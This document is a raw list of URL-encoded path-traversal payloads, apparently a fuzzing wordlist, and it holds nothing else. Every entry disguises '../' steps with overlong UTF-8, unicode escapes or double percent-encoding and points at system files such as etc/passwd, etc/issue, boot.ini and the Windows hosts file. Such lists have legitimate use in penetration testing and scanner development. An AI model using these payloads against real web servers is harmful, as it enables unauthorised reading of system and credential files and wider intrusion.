-%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216issue -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216boot.ini -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216passwd -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216issue -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216boot.ini -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8passwd -%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8issue -%f0%80%80%ae%f0%80%80%ae%uEFC8boot.ini -%f0%80%80%ae%f0%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8passwd -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8issue -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8boot.ini -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8passwd -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8issue -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8boot.ini -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8passwd -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8issue -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8boot.ini -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8passwd -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8issue -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8boot.ini -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8passwd -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8etc%uEFC8issue -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8boot.ini -%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8%f0%80%80%ae%f0%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025passwd -%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025issue -%f0%80%80%ae%f0%80%80%ae%uF025boot.ini -%f0%80%80%ae%f0%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025passwd -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025issue -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025boot.ini -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025passwd -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025issue -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025boot.ini -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025passwd -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025issue -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025boot.ini -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025passwd -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025issue -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025boot.ini -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025passwd -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025etc%uF025issue -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025boot.ini -%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025%f0%80%80%ae%f0%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66passwd -%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66issue -%f0%80%80%ae%f0%80%80%ae%%32%%66boot.ini -%f0%80%80%ae%f0%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66passwd -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66issue -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66boot.ini -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66passwd -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66issue -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66boot.ini -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66passwd -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66issue -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66boot.ini -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66passwd -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66issue -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66boot.ini -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66passwd -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66etc%%32%%66issue -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66boot.ini -%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66%f0%80%80%ae%f0%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63passwd -%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63issue -%f0%80%80%ae%f0%80%80%ae%%35%%63boot.ini -%f0%80%80%ae%f0%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63passwd -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63issue -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63boot.ini -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63passwd -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63issue -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63boot.ini -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63passwd -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63issue -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63boot.ini -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63passwd -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63issue -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63boot.ini -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63passwd -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63etc%%35%%63issue -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63boot.ini -%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63%f0%80%80%ae%f0%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afissue -%f0%80%80%ae%f0%80%80%ae%e0%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afissue -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afissue -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afissue -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afissue -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afetc%e0%80%afissue -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%af%f0%80%80%ae%f0%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cissue -%f0%80%80%ae%f0%80%80%ae%25c1%259cboot.ini -%f0%80%80%ae%f0%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cissue -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cboot.ini -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cissue -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cboot.ini -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cissue 